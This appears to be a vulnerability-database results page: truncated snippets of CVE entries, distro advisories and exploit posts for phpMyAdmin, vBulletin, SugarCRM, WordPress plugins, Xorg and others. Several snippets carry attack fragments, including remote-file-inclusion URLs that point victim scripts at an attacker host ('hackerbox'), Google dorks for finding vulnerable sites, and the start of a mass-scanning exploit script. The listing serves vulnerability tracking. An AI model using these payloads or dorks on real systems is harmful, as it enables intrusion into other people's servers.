DEBIAN-CVE-2016-9853

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

UBUNTU-CVE-2016-9853

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

Path traversal

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

CVE-2016-9853

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

CVE-2016-9853

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

PHP 'fopen_wrappers.c' Integer Overflow Vulnerability

PHP is a new language for writing CGI programs. An integer overflow vulnerability exists in PHP 'fopenwrappers.c'. An attacker could be allowed to exploit this vulnerability to execute arbitrary code in the context of a user's affected application, or a failed attack would result in a denial of...

VBULLETIN 5.2.0/5.2.1/5.2.2 MEDIA UPLOAD SSRF PRIVILEGE ESCALATION

Author: c1tas, p0wd3r know Chong Yu 404 security lab CVE: CVE-2016-6483 A vulnerability overview vBulletin accepts the url parameters, it is not prohibited to jump transduction induced SSRF vBulletin need this function to access external connections, but this limit is not strict cause can trigger...

PHP File Vault 0.9 Directory Traversal / File Read

PHP File Vault version 0.9 , remote directory traversal and read file vulnerabilty ================================================================================== Discovered by NA, NAattutanota.com ====================================== Description =========== A very small PHP website...

SugarCRM 6.5.18 fopen() Command Injection / XSS / SSRF

----------------------------------------------------------------------------- SugarCRM generateTitle; User input passed through the "typemodule" request parameter isn’t properly sanitized before being used to instantiate a new DashletRssFeedTitle object, and this could be exploited to carry out...

PHP Utility Belt - Remote Code Execution

Exploit Title : PHP utility belt Remote Code Execution vulnerability Author : WICS Date : 8/12/2015 Software Link : https://github.com/mboynes/php-utility-belt Overview: PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it. ajax.php is...

CVE-2007-0448

The fopen function in PHP 5.2.0 does not properly handle invalid URI handlers, which allows context-dependent attackers to bypass safemode restrictions and read arbitrary files via a file path specified with an invalid URI, as demonstrated via the srpath URI...

up.time 7.5.0 Upload And Execute File Exploit

Exploit for php platform in category web applications up.time 7.5.0 Upload And Execute File Exploit Vendor: Idera Inc. Product web page: http://www.uptimesoftware.com Affected version: 7.5.0 build 16 and 7.4.0 build 13 Summary: The next-generation of IT monitoring software. Desc: up.time suffers...

Webboard <= 2.90 beta - Remote File Disclosure Vulnerability

No description provided by source. Webboard = v.2.90 beta Remote File Disclosure Vulnerability ============================================================= Author: MrDoug Email: mrdoug13 at gmail dot com Greetz to all my friends ============================================================= There...

phpWebLog <= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

Sports PHool <= 1.0 - Remote File Include Exploit

No description provided by source. ?php / Sports PHool = 1.0 Remote File Include Exploit Found and c0ded by cr4wl3r @hackb0x d0rk: no d0rk f0r kiddi0ts Script: http://sourceforge.net/projects/sportsphool/files/ usage: target: http://target/sportsphool/includes/layout/plain.footer.php?mainnav= evi...

webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability

No description provided by source. :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered by dun \ posdubatgmail.com 2012-06-27 webERP = 4.08.1 Local/Remote File Inclusion Vulnerability Script: Accounting & Best...

Xorg 1.4 to 1.11.2 File Permission Change PoC

No description provided by source. / xchmod.c -- Xorg file permission change vulnerability PoC Author: vladz http://vladz.devzero.fr Date: 2011/12/15 Software: www.x.org Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USECHMOD preprocessor identifier Test...

WordPress Woopra plugin remote PHP arbitrary code execution exploit.

No description provided by source. Exploit Title: woopra plugins execute arbitrary PHP code Exploit Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/ Date: 06-10-2013 Exploit Author: wantexz Vendor Homepage:wordpress.org/plugins/woopra/ Software Link:...

Mandrake Linux Security Advisory : xpdf (MDKSA-2000:041-1)

There is a potential race condition when using tmpnam and fopen in xpdf versions prior to 0.91. This exploit can be only used as root to overwrite arbitrary files if a symlink is created between the calls to tmpname and fopen. There is also a problem with malicious URL-type links in PDF documents...

phpcms-exp 0day-vulnerability warning-the black bar safety net

Reprinted from dis9.com ---------------------- ? php errorreportingEERROR; settimelimit0; $keyword=’inurl:about/joinus’ ; // batch keywords $timeout = 1; $stratpage = 1; $lastpage = 1 0 0 0 0 0 0 0; for $i=$stratpage ; $i=$lastpage ; $i++ $array=ReadBaiduList$keyword,$timeout,$i; foreach $array a...